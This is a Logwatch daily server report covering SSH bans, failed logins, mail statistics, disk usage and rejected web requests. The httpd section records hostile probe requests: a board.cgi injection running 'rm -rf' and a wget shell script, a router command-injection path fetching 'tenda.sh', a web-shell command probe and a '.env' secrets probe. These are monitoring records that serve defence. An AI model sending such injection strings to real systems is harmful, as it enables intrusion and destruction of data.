################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Feb 12 04:42:03 2024
Date Range Processed: yesterday
( 2024-Feb-11 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [301:301]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
81.94.156.139 -> google.com:443: 1 Time(s)
A total of 8 sites probed the server
Requests with error response codes
400 Bad Request
null: 7 Time(s)
*: 4 Time(s)
/aaa9: 2 Time(s)
/aab9: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
.(I\x81Ul~4\xF8\xD3%\x89o\xF8\x83\xC8\x98\ ... D\xC0$\xC0(\xC0: 1 Time(s)
/: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
\x19\xE0\xED\xB0\xF8\x19\x7F\x91\x88\xFC\x ... x09\xC0\x13\xC0: 1 Time(s)
\xA9/\x9C\xCC\xD0\xCC\xE1\x95\xD8\xC15`b\x ... 4\xF0F\x13\xCE{: 1 Time(s)
board.cgi?cmd=rm%20-rf%20%2A%3B%20cd%20%2F ... %20.%2Fwget1.sh: 1 Time(s)
google.com:443: 1 Time(s)
mstshash=Administr: 1 Time(s)
500 Internal Server Error
/: 14 Time(s)
/aaa9: 2 Time(s)
/aab9: 2 Time(s)
/cgi-bin/luci/;stok=/locale?form=country&o ... 20.%2Ftenda.sh): 2 Time(s)
/.env: 1 Time(s)
/actuator/gateway/routes: 1 Time(s)
/cgi-bin/jarrewrite.sh: 1 Time(s)
/spt.php?run=ls%20/sbin: 1 Time(s)
502 Bad Gateway
/DJN1EHJMQt-tpE1lNqpnaw/pdf: 1 Time(s)
/N0J5lsJlTxmRAXVI1Mlgpw/pdf: 1 Time(s)
/Reso_DigitalePruefungen/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 990 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
10 Miscellaneous warnings
11.785K Bytes accepted 12,068
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
30 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
30 Total 4xx Rejects 100.00%
======== ==================================================
56 Connections
15 Connections lost (inbound)
56 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
**Unmatched Entries**
systemd-logind: New seat seat0.: 1 Time(s)
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
SSHD Started: 2 Time(s)
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
root : 4 Time(s)
Failed logins from:
Illegal users from:
undef: 609 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop30261p1 394G 243G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################